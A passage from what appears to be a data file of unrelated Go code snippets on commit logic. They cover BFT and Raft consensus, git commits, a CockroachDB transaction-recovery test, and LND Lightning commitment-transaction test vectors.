{\n\t\t// Done enterCommit:\n\t\t// keep cs.Round the same, commitRound points to the right Precommits set.\n\t\tcs.updateRoundStep(cs.Round, ttypes.RoundStepCommit)\n\t\tcs.CommitRound = commitRound\n\t\tcs.CommitTime = time.Now()\n\t\tcs.newStep()\n\n\t\t// Maybe finalize immediately.\n\t\tcs.tryFinalizeCommit(height)\n\t}()\n\n\tvar blockID tmtypes.QbftBlockID\n\tvar ok bool\n\tif cs.state.Sequence == 0 {\n\t\tblockID, ok = cs.Votes.Precommits(commitRound).TwoThirdsMajority()\n\t\tif !ok {\n\t\t\tpanic(\"enterCommit expects +2/3 precommits\")\n\t\t}\n\t} else {\n\t\tblockID, ok = cs.Votes.Prevotes(commitRound).TwoThirdsMajority()\n\t\tif !ok {\n\t\t\tpanic(\"enterCommit expects +2/3 prevotes\")\n\t\t}\n\t}\n\n\t// The Locked* fields no longer matter.\n\t// Move them over to ProposalBlock if they match the commit hash,\n\t// otherwise they'll be cleared in updateToState.\n\tif cs.LockedBlock.HashesTo(blockID.Hash) {\n\t\tqbftlog.Info(\"Commit is for locked block. Set ProposalBlock=LockedBlock\", \"LockedBlock-hash\", fmt.Sprintf(\"%X\", blockID.Hash))\n\t\tcs.ProposalBlock = cs.LockedBlock\n\t\tcs.ProposalBlockHash = blockID.Hash\n\t}\n\n\t// If we don't have the block being committed, set up to get it.\n\tif !cs.ProposalBlock.HashesTo(blockID.Hash) {\n\t\tqbftlog.Info(\"Commit is for a block we don't know about. Set ProposalBlock=nil\",\n\t\t\t\"proposal\", fmt.Sprintf(\"%X\", cs.ProposalBlock.Hash()),\n\t\t\t\"ProposalBlockHash\", fmt.Sprintf(\"%X\", cs.ProposalBlockHash),\n\t\t\t\"commit\", fmt.Sprintf(\"%X\", blockID.Hash))\n\t\t// We're getting the wrong block.\n\t\t// Set up ProposalBlockHash and keep waiting.\n\t\tcs.ProposalBlock = nil\n\t\tcs.ProposalBlockHash = blockID.Hash\n\n\t\tvalidBlockMsg := &tmtypes.QbftValidBlockMsg{\n\t\t\tHeight: cs.Height,\n\t\t\tRound: int32(cs.Round),\n\t\t\tBlockhash: cs.ProposalBlockHash,\n\t\t\tIsCommit: true,\n\t\t}\n\t\tcs.broadcastChannel <- MsgInfo{TypeID: ttypes.ValidBlockID, Msg: validBlockMsg, PeerID: \"\", PeerIP: \"\"}\n\t\t//else {\n\t\t// We just need to keep waiting.\n\t\t//}\n\t}\n}", "func (r *RaftNode) shiftToFollower(t Term, leaderID HostID) {\n\tif r.verbose {\n\t\tlog.Printf(\"############ SHIFT TO FOLLOWER, Term: %d, LeaderID: %d\", t, leaderID)\n\t}\n\tr.state = follower\n\tr.CurrentTerm = t\n\tr.currentLeader = leaderID\n\tr.nextIndex = nil\n\tr.matchIndex = nil\n\tr.VotedFor = -1\n}", "func TestTransferNonMember(t *testing.T) {\n\tr := newTestRaft(1, []uint64{2, 3, 4}, 5, 1, NewMemoryStorage())\n\tdefer closeAndFreeRaft(r)\n\tr.Step(pb.Message{From: 2, To: 1, Type: pb.MsgTimeoutNow})\n\n\tr.Step(pb.Message{From: 2, To: 1, Type: pb.MsgVoteResp})\n\tr.Step(pb.Message{From: 3, To: 1, Type: pb.MsgVoteResp})\n\tif r.state != StateFollower {\n\t\tt.Fatalf(\"state is %s, want StateFollower\", r.state)\n\t}\n}", "func TestTlfNameChangePublic(t *testing.T) {\n\ttest(t,\n\t\tusers(\"alice\", \"bob\", \"charlie\"),\n\t\tinPublicTlf(\"alice,charlie@twitter\"),\n\t\tas(alice,\n\t\t\tmkfile(\"alice.txt\", \"hello charlie\"),\n\t\t),\n\t\tas(bob,\n\t\t\tread(\"alice.txt\", \"hello charlie\"),\n\t\t\texpectError(mkfile(\"bob.txt\", \"hello alice & charlie\"),\n\t\t\t\t\"bob does not have write access to directory /keybase/public/alice,charlie@twitter\"),\n\t\t\tnoSync(),\n\t\t),\n\t\tas(charlie,\n\t\t\tread(\"alice.txt\", \"hello charlie\"),\n\t\t\texpectError(mkfile(\"charlie.txt\", \"hello alice\"),\n\t\t\t\t\"charlie does not have write access to directory /keybase/public/alice,charlie@twitter\"),\n\t\t\tnoSync(),\n\t\t\tdisableUpdates(),\n\t\t),\n\n\t\taddNewAssertion(\"charlie\", \"charlie@twitter\"),\n\t\tas(alice,\n\t\t\t// TODO: Ideally, we wouldn't have to do this,\n\t\t\t// and we'd just wait for a rekey.\n\t\t\trekey(),\n\t\t),\n\n\t\tinPublicTlfNonCanonical(\n\t\t\t\"alice,charlie@twitter\", \"alice,charlie\"),\n\t\tas(charlie,\n\t\t\tmkfile(\"charlie1.txt\", \"hello alice1\"),\n\t\t),\n\n\t\tinPublicTlf(\"alice,charlie\"),\n\t\tas(charlie,\n\t\t\tmkfile(\"charlie2.txt\", \"hello alice2\"),\n\t\t),\n\n\t\tinPublicTlfNonCanonical(\n\t\t\t\"alice,charlie@twitter\", \"alice,charlie\"),\n\t\tas(alice,\n\t\t\tread(\"charlie1.txt\", \"hello alice1\"),\n\t\t\tread(\"charlie2.txt\", \"hello alice2\"),\n\t\t),\n\t\tas(bob,\n\t\t\tread(\"charlie1.txt\", \"hello alice1\"),\n\t\t\tread(\"charlie2.txt\", \"hello alice2\"),\n\t\t),\n\t\tas(charlie,\n\t\t\tread(\"charlie1.txt\", \"hello alice1\"),\n\t\t\tread(\"charlie2.txt\", \"hello alice2\"),\n\t\t),\n\n\t\tinPublicTlf(\"alice,charlie\"),\n\t\tas(alice,\n\t\t\tread(\"charlie1.txt\", \"hello alice1\"),\n\t\t\tread(\"charlie2.txt\", \"hello alice2\"),\n\t\t),\n\t\tas(bob,\n\t\t\tread(\"charlie1.txt\", \"hello alice1\"),\n\t\t\tread(\"charlie2.txt\", \"hello alice2\"),\n\t\t),\n\t\tas(charlie,\n\t\t\tread(\"charlie1.txt\", \"hello alice1\"),\n\t\t\tread(\"charlie2.txt\", \"hello alice2\"),\n\t\t),\n\t)\n}", "func (bft *ProtocolBFTCoSi) handleCommitmentCommit(c chan commitChan) error {\n\tbft.tmpMutex.Lock()\n\tdefer bft.tmpMutex.Unlock() // NOTE potentially locked for the whole timeout\n\n\t// wait until we have enough RoundCommit commitments or timeout\n\t// should do nothing if `c` is closed\n\tbft.readCommitChan(c, RoundCommit)\n\n\t// TODO this will not always work for non-star graphs\n\tif len(bft.tempCommitCommit) < len(bft.Children())-bft.allowedExceptions {\n\t\tbft.signRefusal = true\n\t\tlog.Error(\"not enough commit commitment messages\")\n\t}\n\n\tcommitment := bft.commit.Commit(bft.Suite().RandomStream(), bft.tempCommitCommit)\n\tif bft.IsRoot() {\n\t\t// do nothing:\n\t\t// stop the processing of the round, wait the end of\n\t\t// the \"prepare\" round: calls startChallengeCommit\n\t\treturn nil\n\t}\n\treturn bft.SendToParent(&Commitment{\n\t\tTYPE: RoundCommit,\n\t\tCommitment: commitment,\n\t})\n}", "func (s *GitService) commit(w *git.Worktree, r *git.Repository, c *CreateCommit) (*object.Commit, error) {\n\t// Commits the current staging area to the repository, with the new file\n\t// just created. We should provide the object.Signature of Author of the\n\t// gitClient Since version 5.0.1, we can omit the Author signature, being read\n\t// from the git config files.\n\tvar p []plumbing.Hash\n\tif c.Parents != nil && len(c.Parents) > 0 {\n\t\tp = make([]plumbing.Hash, len(c.Parents))\n\t}\n\tif p != nil && len(p) > 0 {\n\t\tfor i, parent := range c.Parents {\n\t\t\tcopy(p[i][:], parent)\n\t\t}\n\t}\n\n\t// calculate time.Time from unix Time\n\tauthorDate := time.Unix(c.Author.Date, 0)\n\tvar committer *object.Signature\n\tif c.Committer != nil {\n\t\tcommitterDate := time.Unix(c.Committer.Date, 0)\n\t\tcommitter = &object.Signature{\n\t\t\tName: c.Committer.Name,\n\t\t\tEmail: c.Committer.Email,\n\t\t\tWhen: committerDate,\n\t\t}\n\t} else {\n\t\tcommitter = &object.Signature{\n\t\t\tName: c.Author.Name,\n\t\t\tEmail: c.Author.Email,\n\t\t\tWhen: authorDate,\n\t\t}\n\t}\n\n\tcommitHash, err := w.Commit(c.Message, &git.CommitOptions{\n\t\tAuthor: &object.Signature{\n\t\t\tName: c.Author.Name,\n\t\t\tEmail: c.Author.Email,\n\t\t\tWhen: authorDate,\n\t\t},\n\t\tCommitter: committer,\n\t\tParents: p,\n\t\tSignKey: c.SignKey,\n\t\tAll: true,\n\t})\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tobj, err := r.CommitObject(commitHash)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn obj, nil\n}", "func TestRecoverTxnRecordChanged(t *testing.T) {\n\tdefer leaktest.AfterTest(t)()\n\tdefer log.Scope(t).Close(t)\n\n\tctx := context.Background()\n\tk := roachpb.Key(\"a\")\n\tts := hlc.Timestamp{WallTime: 1}\n\ttxn := roachpb.MakeTransaction(\"test\", k, 0, ts, 0)\n\ttxn.Status = roachpb.STAGING\n\n\ttestCases := []struct {\n\t\tname string\n\t\timplicitlyCommitted bool\n\t\texpError string\n\t\tchangedTxn roachpb.Transaction\n\t}{\n\t\t{\n\t\t\tname: \"transaction commit after all writes found\",\n\t\t\timplicitlyCommitted: true,\n\t\t\tchangedTxn: func() roachpb.Transaction {\n\t\t\t\ttxnCopy := txn\n\t\t\t\ttxnCopy.Status = roachpb.COMMITTED\n\t\t\t\ttxnCopy.InFlightWrites = nil\n\t\t\t\treturn txnCopy\n\t\t\t}(),\n\t\t},\n\t\t{\n\t\t\tname: \"transaction abort after all writes found\",\n\t\t\timplicitlyCommitted: true,\n\t\t\texpError: \"found ABORTED record for implicitly committed transaction\",\n\t\t\tchangedTxn: func() roachpb.Transaction {\n\t\t\t\ttxnCopy := txn\n\t\t\t\ttxnCopy.Status = roachpb.ABORTED\n\t\t\t\ttxnCopy.InFlightWrites = nil\n\t\t\t\treturn txnCopy\n\t\t\t}(),\n\t\t},\n\t\t{\n\t\t\tname: \"transaction restart after all writes found\",\n\t\t\timplicitlyCommitted: true,\n\t\t\texpError: \"epoch change by implicitly committed transaction: 0->1\",\n\t\t\tchangedTxn: func() roachpb.Transaction {\n\t\t\t\ttxnCopy := txn\n\t\t\t\ttxnCopy.BumpEpoch()\n\t\t\t\treturn txnCopy\n\t\t\t}(),\n\t\t},\n\t\t{\n\t\t\tname: \"transaction timestamp increase after all writes found\",\n\t\t\timplicitlyCommitted: true,\n\t\t\texpError: \"timestamp change by implicitly committed transaction: 0.000000001,0->0.000000002,0\",\n\t\t\tchangedTxn: func() roachpb.Transaction {\n\t\t\t\ttxnCopy := txn\n\t\t\t\ttxnCopy.WriteTimestamp = txnCopy.WriteTimestamp.Add(1, 0)\n\t\t\t\treturn txnCopy\n\t\t\t}(),\n\t\t},\n\t\t{\n\t\t\tname: \"transaction commit after write prevented\",\n\t\t\timplicitlyCommitted: false,\n\t\t\tchangedTxn: func() roachpb.Transaction {\n\t\t\t\ttxnCopy := txn\n\t\t\t\ttxnCopy.Status = roachpb.COMMITTED\n\t\t\t\ttxnCopy.InFlightWrites = nil\n\t\t\t\treturn txnCopy\n\t\t\t}(),\n\t\t},\n\t\t{\n\t\t\tname: \"transaction abort after write prevented\",\n\t\t\timplicitlyCommitted: false,\n\t\t\tchangedTxn: func() roachpb.Transaction {\n\t\t\t\ttxnCopy := txn\n\t\t\t\ttxnCopy.Status = roachpb.ABORTED\n\t\t\t\ttxnCopy.InFlightWrites = nil\n\t\t\t\treturn txnCopy\n\t\t\t}(),\n\t\t},\n\t\t{\n\t\t\tname: \"transaction restart (pending) after write prevented\",\n\t\t\timplicitlyCommitted: false,\n\t\t\tchangedTxn: func() roachpb.Transaction {\n\t\t\t\ttxnCopy := txn\n\t\t\t\ttxnCopy.BumpEpoch()\n\t\t\t\ttxnCopy.Status = roachpb.PENDING\n\t\t\t\treturn txnCopy\n\t\t\t}(),\n\t\t},\n\t\t{\n\t\t\tname: \"transaction restart (staging) after write prevented\",\n\t\t\timplicitlyCommitted: false,\n\t\t\tchangedTxn: func() roachpb.Transaction {\n\t\t\t\ttxnCopy := txn\n\t\t\t\ttxnCopy.BumpEpoch()\n\t\t\t\treturn txnCopy\n\t\t\t}(),\n\t\t},\n\t\t{\n\t\t\tname: \"transaction timestamp increase (pending) after write prevented\",\n\t\t\timplicitlyCommitted: false,\n\t\t\texpError: \"cannot recover PENDING transaction in same epoch\",\n\t\t\tchangedTxn: func() roachpb.Transaction {\n\t\t\t\ttxnCopy := txn\n\t\t\t\ttxnCopy.Status = roachpb.PENDING\n\t\t\t\ttxnCopy.InFlightWrites = nil\n\t\t\t\ttxnCopy.WriteTimestamp = txnCopy.WriteTimestamp.Add(1, 0)\n\t\t\t\treturn txnCopy\n\t\t\t}(),\n\t\t},\n\t\t{\n\t\t\tname: \"transaction timestamp increase (staging) after write prevented\",\n\t\t\timplicitlyCommitted: false,\n\t\t\tchangedTxn: func() roachpb.Transaction {\n\t\t\t\ttxnCopy := txn\n\t\t\t\ttxnCopy.WriteTimestamp = txnCopy.WriteTimestamp.Add(1, 0)\n\t\t\t\treturn txnCopy\n\t\t\t}(),\n\t\t},\n\t}\n\tfor _, c := range testCases {\n\t\tt.Run(c.name, func(t *testing.T) {\n\t\t\tdb := storage.NewDefaultInMemForTesting()\n\t\t\tdefer db.Close()\n\n\t\t\t// Write the modified transaction record, simulating a concurrent\n\t\t\t// actor changing the transaction record before the RecoverTxn\n\t\t\t// request is evaluated.\n\t\t\ttxnKey := keys.TransactionKey(txn.Key, txn.ID)\n\t\t\ttxnRecord := c.changedTxn.AsRecord()\n\t\t\tif err := storage.MVCCPutProto(ctx, db, nil, txnKey, hlc.Timestamp{}, nil, &txnRecord); err != nil {\n\t\t\t\tt.Fatal(err)\n\t\t\t}\n\n\t\t\t// Issue a RecoverTxn request.\n\t\t\tvar resp roachpb.RecoverTxnResponse\n\t\t\t_, err := RecoverTxn(ctx, db, CommandArgs{\n\t\t\t\tArgs: &roachpb.RecoverTxnRequest{\n\t\t\t\t\tRequestHeader: roachpb.RequestHeader{Key: txn.Key},\n\t\t\t\t\tTxn: txn.TxnMeta,\n\t\t\t\t\tImplicitlyCommitted: c.implicitlyCommitted,\n\t\t\t\t},\n\t\t\t\tHeader: roachpb.Header{\n\t\t\t\t\tTimestamp: ts,\n\t\t\t\t},\n\t\t\t}, &resp)\n\n\t\t\tif c.expError != \"\" {\n\t\t\t\tif !testutils.IsError(err, c.expError) {\n\t\t\t\t\tt.Fatalf(\"expected error %q; found %v\", c.expError, err)\n\t\t\t\t}\n\t\t\t} else {\n\t\t\t\tif err != nil {\n\t\t\t\t\tt.Fatal(err)\n\t\t\t\t}\n\n\t\t\t\t// Assert that the response is correct.\n\t\t\t\texpTxnRecord := c.changedTxn.AsRecord()\n\t\t\t\texpTxn := expTxnRecord.AsTransaction()\n\t\t\t\trequire.Equal(t, expTxn, resp.RecoveredTxn)\n\n\t\t\t\t// Assert that the txn record was not modified.\n\t\t\t\tvar resTxnRecord roachpb.Transaction\n\t\t\t\tif _, err := storage.MVCCGetProto(\n\t\t\t\t\tctx, db, txnKey, hlc.Timestamp{}, &resTxnRecord, storage.MVCCGetOptions{},\n\t\t\t\t); err != nil {\n\t\t\t\t\tt.Fatal(err)\n\t\t\t\t}\n\t\t\t\trequire.Equal(t, expTxn, resTxnRecord)\n\t\t\t}\n\t\t})\n\t}\n}", "func (e *Election) commitIfLast(msg *messages.LeaderLevelMessage) *messages.LeaderLevelMessage {\n\t// If commit is true, then we are done. Return the EOM\n\t// commit := e.CommitmentIndicator.ShouldICommit(msg)\n\tif e.CommitmentTally > 3 { //commit {\n\t\te.Committed = true\n\t\tmsg.Committed = true\n\t\tmsg.EOMFrom = e.Self\n\t\te.executeDisplay(msg)\n\t}\n\treturn msg\n}", "func TestCommitmentAndHTLCTransactions(t *testing.T) {\n\tt.Parallel()\n\n\ttc, err := newTestContext()\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\n\t// Generate random some keys that don't actually matter but need to be set.\n\tvar (\n\t\tidentityKey *btcec.PublicKey\n\t\tlocalDelayBasePoint *btcec.PublicKey\n\t)\n\tgenerateKeys := []**btcec.PublicKey{\n\t\t&identityKey,\n\t\t&localDelayBasePoint,\n\t}\n\tfor _, keyRef := range generateKeys {\n\t\tprivkey, err := btcec.NewPrivateKey(btcec.S256())\n\t\tif err != nil {\n\t\t\tt.Fatalf(\"Failed to generate new key: %v\", err)\n\t\t}\n\t\t*keyRef = privkey.PubKey()\n\t}\n\n\t// Manually construct a new LightningChannel.\n\tchannelState := channeldb.OpenChannel{\n\t\tChanType: channeldb.SingleFunderTweaklessBit,\n\t\tChainHash: *tc.netParams.GenesisHash,\n\t\tFundingOutpoint: tc.fundingOutpoint,\n\t\tShortChannelID: tc.shortChanID,\n\t\tIsInitiator: true,\n\t\tIdentityPub: identityKey,\n\t\tLocalChanCfg: channeldb.ChannelConfig{\n\t\t\tChannelConstraints: channeldb.ChannelConstraints{\n\t\t\t\tDustLimit: tc.dustLimit,\n\t\t\t\tMaxPendingAmount: lnwire.NewMSatFromSatoshis(tc.fundingAmount),\n\t\t\t\tMaxAcceptedHtlcs: input.MaxHTLCNumber,\n\t\t\t\tCsvDelay: tc.localCsvDelay,\n\t\t\t},\n\t\t\tMultiSigKey: keychain.KeyDescriptor{\n\t\t\t\tPubKey: tc.localFundingPubKey,\n\t\t\t},\n\t\t\tPaymentBasePoint: keychain.KeyDescriptor{\n\t\t\t\tPubKey: tc.localPaymentBasePoint,\n\t\t\t},\n\t\t\tHtlcBasePoint: keychain.KeyDescriptor{\n\t\t\t\tPubKey: tc.localPaymentBasePoint,\n\t\t\t},\n\t\t\tDelayBasePoint: keychain.KeyDescriptor{\n\t\t\t\tPubKey: localDelayBasePoint,\n\t\t\t},\n\t\t},\n\t\tRemoteChanCfg: channeldb.ChannelConfig{\n\t\t\tMultiSigKey: keychain.KeyDescriptor{\n\t\t\t\tPubKey: tc.remoteFundingPubKey,\n\t\t\t},\n\t\t\tPaymentBasePoint: keychain.KeyDescriptor{\n\t\t\t\tPubKey: tc.remotePaymentBasePoint,\n\t\t\t},\n\t\t\tHtlcBasePoint: keychain.KeyDescriptor{\n\t\t\t\tPubKey: tc.remotePaymentBasePoint,\n\t\t\t},\n\t\t},\n\t\tCapacity: tc.fundingAmount,\n\t\tRevocationProducer: shachain.NewRevocationProducer(zeroHash),\n\t}\n\tsigner := &input.MockSigner{\n\t\tPrivkeys: []*btcec.PrivateKey{\n\t\t\ttc.localFundingPrivKey, tc.localPaymentPrivKey,\n\t\t},\n\t\tNetParams: tc.netParams,\n\t}\n\n\t// Construct a LightningChannel manually because we don't have nor need all\n\t// of the dependencies.\n\tchannel := LightningChannel{\n\t\tchannelState: &channelState,\n\t\tSigner: signer,\n\t\tcommitBuilder: NewCommitmentBuilder(&channelState),\n\t}\n\terr = channel.createSignDesc()\n\tif err != nil {\n\t\tt.Fatalf(\"Failed to generate channel sign descriptor: %v\", err)\n\t}\n\n\t// The commitmentPoint is technically hidden in the spec, but we need it to\n\t// generate the correct tweak.\n\ttweak := input.SingleTweakBytes(tc.commitmentPoint, tc.localPaymentBasePoint)\n\tkeys := &CommitmentKeyRing{\n\t\tCommitPoint: tc.commitmentPoint,\n\t\tLocalCommitKeyTweak: tweak,\n\t\tLocalHtlcKeyTweak: tweak,\n\t\tLocalHtlcKey: tc.localPaymentPubKey,\n\t\tRemoteHtlcKey: tc.remotePaymentPubKey,\n\t\tToLocalKey: tc.localDelayPubKey,\n\t\tToRemoteKey: tc.remotePaymentPubKey,\n\t\tRevocationKey: tc.localRevocationPubKey,\n\t}\n\n\t// testCases encode the raw test vectors specified in Appendix C of BOLT 03.\n\ttestCases := []struct {\n\t\tcommitment channeldb.ChannelCommitment\n\t\thtlcDescs []htlcDesc\n\t\texpectedCommitmentTxHex string\n\t\tremoteSigHex string\n\t}{\n\t\t{\n\t\t\tcommitment: channeldb.ChannelCommitment{\n\t\t\t\tCommitHeight: 42,\n\t\t\t\tLocalBalance: 7000000000,\n\t\t\t\tRemoteBalance: 3000000000,\n\t\t\t\tFeePerKw: 15000,\n\t\t\t},\n\t\t\thtlcDescs: []htlcDesc{},\n\t\t\texpectedCommitmentTxHex: \"02000000000101bef67e4e2fb9ddeeb3461973cd4c62abb35050b1add772995b820b584a488489000000000038b02b8002c0c62d0000000000160014ccf1af2f2aabee14bb40fa3851ab2301de84311054a56a00000000002200204adb4e2f00643db396dd120d4e7dc17625f5f2c11a40d857accc862d6b7dd80e0400473044022051b75c73198c6deee1a875871c3961832909acd297c6b908d59e3319e5185a46022055c419379c5051a78d00dbbce11b5b664a0c22815fbcc6fcef6b1937c383693901483045022100f51d2e566a70ba740fc5d8c0f07b9b93d2ed741c3c0860c613173de7d39e7968022041376d520e9c0e1ad52248ddf4b22e12be8763007df977253ef45a4ca3bdb7c001475221023da092f6980e58d2c037173180e9a465476026ee50f96695963e8efe436f54eb21030e9f7b623d2ccc7c9bd44d66d5ce21ce504c0acf6385a132cec6d3c39fa711c152ae3e195220\",\n\t\t\tremoteSigHex: \"3045022100f51d2e566a70ba740fc5d8c0f07b9b93d2ed741c3c0860c613173de7d39e7968022041376d520e9c0e1ad52248ddf4b22e12be8763007df977253ef45a4ca3bdb7c0\",\n\t\t},\n\t\t{\n\t\t\tcommitment: channeldb.ChannelCommitment{\n\t\t\t\tCommitHeight: 42,\n\t\t\t\tLocalBalance: 6988000000,\n\t\t\t\tRemoteBalance: 3000000000,\n\t\t\t\tFeePerKw: 0,\n\t\t\t},\n\t\t\thtlcDescs: []htlcDesc{\n\t\t\t\t{\n\t\t\t\t\tindex: 0,\n\t\t\t\t\tremoteSigHex: \"304402206a6e59f18764a5bf8d4fa45eebc591566689441229c918b480fb2af8cc6a4aeb02205248f273be447684b33e3c8d1d85a8e0ca9fa0bae9ae33f0527ada9c162919a6\",\n\t\t\t\t\tresolutionTxHex: \"020000000001018154ecccf11a5fb56c39654c4deb4d2296f83c69268280b94d021370c94e219700000000000000000001e8030000000000002200204adb4e2f00643db396dd120d4e7dc17625f5f2c11a40d857accc862d6b7dd80e050047304402206a6e59f18764a5bf8d4fa45eebc591566689441229c918b480fb2af8cc6a4aeb02205248f273be447684b33e3c8d1d85a8e0ca9fa0bae9ae33f0527ada9c162919a60147304402207cb324fa0de88f452ffa9389678127ebcf4cabe1dd848b8e076c1a1962bf34720220116ed922b12311bd602d67e60d2529917f21c5b82f25ff6506c0f87886b4dfd5012000000000000000000000000000000000000000000000000000000000000000008a76a91414011f7254d96b819c76986c277d115efce6f7b58763ac67210394854aa6eab5b2a8122cc726e9dded053a2184d88256816826d6231c068d4a5b7c8201208763a914b8bcb07f6344b42ab04250c86a6e8b75d3fdbbc688527c21030d417a46946384f88d5f3337267c5e579765875dc4daca813e21734b140639e752ae677502f401b175ac686800000000\",\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\tindex: 2,\n\t\t\t\t\tremoteSigHex: \"3045022100d5275b3619953cb0c3b5aa577f04bc512380e60fa551762ce3d7a1bb7401cff9022037237ab0dac3fe100cde094e82e2bed9ba0ed1bb40154b48e56aa70f259e608b\",\n\t\t\t\t\tresolutionTxHex: \"020000000001018154ecccf11a5fb56c39654c4deb4d2296f83c69268280b94d021370c94e219701000000000000000001d0070000000000002200204adb4e2f00643db396dd120d4e7dc17625f5f2c11a40d857accc862d6b7dd80e0500483045022100d5275b3619953cb0c3b5aa577f04bc512380e60fa551762ce3d7a1bb7401cff9022037237ab0dac3fe100cde094e82e2bed9ba0ed1bb40154b48e56aa70f259e608b01483045022100c89172099507ff50f4c925e6c5150e871fb6e83dd73ff9fbb72f6ce829a9633f02203a63821d9162e99f9be712a68f9e589483994feae2661e4546cd5b6cec007be501008576a91414011f7254d96b819c76986c277d115efce6f7b58763ac67210394854aa6eab5b2a8122cc726e9dded053a2184d88256816826d6231c068d4a5b7c820120876475527c21030d417a46946384f88d5f3337267c5e579765875dc4daca813e21734b140639e752ae67a914b43e1b38138a41b37f7cd9a1d274bc63e3a9b5d188ac6868f6010000\",\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\tindex: 1,\n\t\t\t\t\tremoteSigHex: \"304402201b63ec807771baf4fdff523c644080de17f1da478989308ad13a58b51db91d360220568939d38c9ce295adba15665fa68f51d967e8ed14a007b751540a80b325f202\",\n\t\t\t\t\tresolutionTxHex: \"020000000001018154ecccf11a5fb56c39654c4deb4d2296f83c69268280b94d021370c94e219702000000000000000001d0070000000000002200204adb4e2f00643db396dd120d4e7dc17625f5f2c11a40d857accc862d6b7dd80e050047304402201b63ec807771baf4fdff523c644080de17f1da478989308ad13a58b51db91d360220568939d38c9ce295adba15665fa68f51d967e8ed14a007b751540a80b325f20201483045022100def389deab09cee69eaa1ec14d9428770e45bcbe9feb46468ecf481371165c2f022015d2e3c46600b2ebba8dcc899768874cc6851fd1ecb3fffd15db1cc3de7e10da012001010101010101010101010101010101010101010101010101010101010101018a76a91414011f7254d96b819c76986c277d115efce6f7b58763ac67210394854aa6eab5b2a8122cc726e9dded053a2184d88256816826d6231c068d4a5b7c8201208763a9144b6b2e5444c2639cc0fb7bcea5afba3f3cdce23988527c21030d417a46946384f88d5f3337267c5e579765875dc4daca813e21734b140639e752ae677502f501b175ac686800000000\",\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\tindex: 3,\n\t\t\t\t\tremoteSigHex: \"3045022100daee1808f9861b6c3ecd14f7b707eca02dd6bdfc714ba2f33bc8cdba507bb182022026654bf8863af77d74f51f4e0b62d461a019561bb12acb120d3f7195d148a554\",\n\t\t\t\t\tresolutionTxHex: \"020000000001018154ecccf11a5fb56c39654c4deb4d2296f83c69268280b94d021370c94e219703000000000000000001b80b0000000000002200204adb4e2f00643db396dd120d4e7dc17625f5f2c11a40d857accc862d6b7dd80e0500483045022100daee1808f9861b6c3ecd14f7b707eca02dd6bdfc714ba2f33bc8cdba507bb182022026654bf8863af77d74f51f4e0b62d461a019561bb12acb120d3f7195d148a554014730440220643aacb19bbb72bd2b635bc3f7375481f5981bace78cdd8319b2988ffcc6704202203d27784ec8ad51ed3bd517a05525a5139bb0b755dd719e0054332d186ac0872701008576a91414011f7254d96b819c76986c277d115efce6f7b58763ac67210394854aa6eab5b2a8122cc726e9dded053a2184d88256816826d6231c068d4a5b7c820120876475527c21030d417a46946384f88d5f3337267c5e579765875dc4daca813e21734b140639e752ae67a9148a486ff2e31d6158bf39e2608864d63fefd09d5b88ac6868f7010000\",\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\tindex: 4,\n\t\t\t\t\tremoteSigHex: \"304402207e0410e45454b0978a623f36a10626ef17b27d9ad44e2760f98cfa3efb37924f0220220bd8acd43ecaa916a80bd4f919c495a2c58982ce7c8625153f8596692a801d\",\n\t\t\t\t\tresolutionTxHex: \"020000000001018154ecccf11a5fb56c39654c4deb4d2296f83c69268280b94d021370c94e219704000000000000000001a00f0000000000002200204adb4e2f00643db396dd120d4e7dc17625f5f2c11a40d857accc862d6b7dd80e050047304402207e0410e45454b0978a623f36a10626ef17b27d9ad44e2760f98cfa3efb37924f0220220bd8acd43ecaa916a80bd4f919c495a2c58982ce7c8625153f8596692a801d014730440220549e80b4496803cbc4a1d09d46df50109f546d43fbbf86cd90b174b1484acd5402205f12a4f995cb9bded597eabfee195a285986aa6d93ae5bb72507ebc6a4e2349e012004040404040404040404040404040404040404040404040404040404040404048a76a91414011f7254d96b819c76986c277d115efce6f7b58763ac67210394854aa6eab5b2a8122cc726e9dded053a2184d88256816826d6231c068d4a5b7c8201208763a91418bc1a114ccf9c052d3d23e28d3b0a9d1227434288527c21030d417a46946384f88d5f3337267c5e579765875dc4daca813e21734b140639e752ae677502f801b175ac686800000000\",\n\t\t\t\t},\n\t\t\t},\n\t\t\texpectedCommitmentTxHex: \"02000000000101bef67e4e2fb9ddeeb3461973cd4c62abb35050b1add772995b820b584a488489000000000038b02b8007e80300000000000022002052bfef0479d7b293c27e0f1eb294bea154c63a3294ef092c19af51409bce0e2ad007000000000000220020403d394747cae42e98ff01734ad5c08f82ba123d3d9a620abda88989651e2ab5d007000000000000220020748eba944fedc8827f6b06bc44678f93c0f9e6078b35c6331ed31e75f8ce0c2db80b000000000000220020c20b5d1f8584fd90443e7b7b720136174fa4b9333c261d04dbbd012635c0f419a00f0000000000002200208c48d15160397c9731df9bc3b236656efb6665fbfe92b4a6878e88a499f741c4c0c62d0000000000160014ccf1af2f2aabee14bb40fa3851ab2301de843110e0a06a00000000002200204adb4e2f00643db396dd120d4e7dc17625f5f2c11a40d857accc862d6b7dd80e04004730440220275b0c325a5e9355650dc30c0eccfbc7efb23987c24b556b9dfdd40effca18d202206caceb2c067836c51f296740c7ae807ffcbfbf1dd3a0d56b6de9a5b247985f060147304402204fd4928835db1ccdfc40f5c78ce9bd65249b16348df81f0c44328dcdefc97d630220194d3869c38bc732dd87d13d2958015e2fc16829e74cd4377f84d215c0b7060601475221023da092f6980e58d2c037173180e9a465476026ee50f96695963e8efe436f54eb21030e9f7b623d2ccc7c9bd44d66d5ce21ce504c0acf6385a132cec6d3c39fa711c152ae3e195220\",\n\t\t\tremoteSigHex: \"304402204fd4928835db1ccdfc40f5c78ce9bd65249b16348df81f0c44328dcdefc97d630220194d3869c38bc732dd87d13d2958015e2fc16829e74cd4377f84d215c0b70606\",\n\t\t},\n\t\t{\n\t\t\tcommitment: channeldb.ChannelCommitment{\n\t\t\t\tCommitHeight: 42,\n\t\t\t\tLocalBalance: 6988000000,\n\t\t\t\tRemoteBalance: 3000000000,\n\t\t\t\tFeePerKw: 647,\n\t\t\t},\n\t\t\thtlcDescs: []htlcDesc{\n\t\t\t\t{\n\t\t\t\t\tindex: 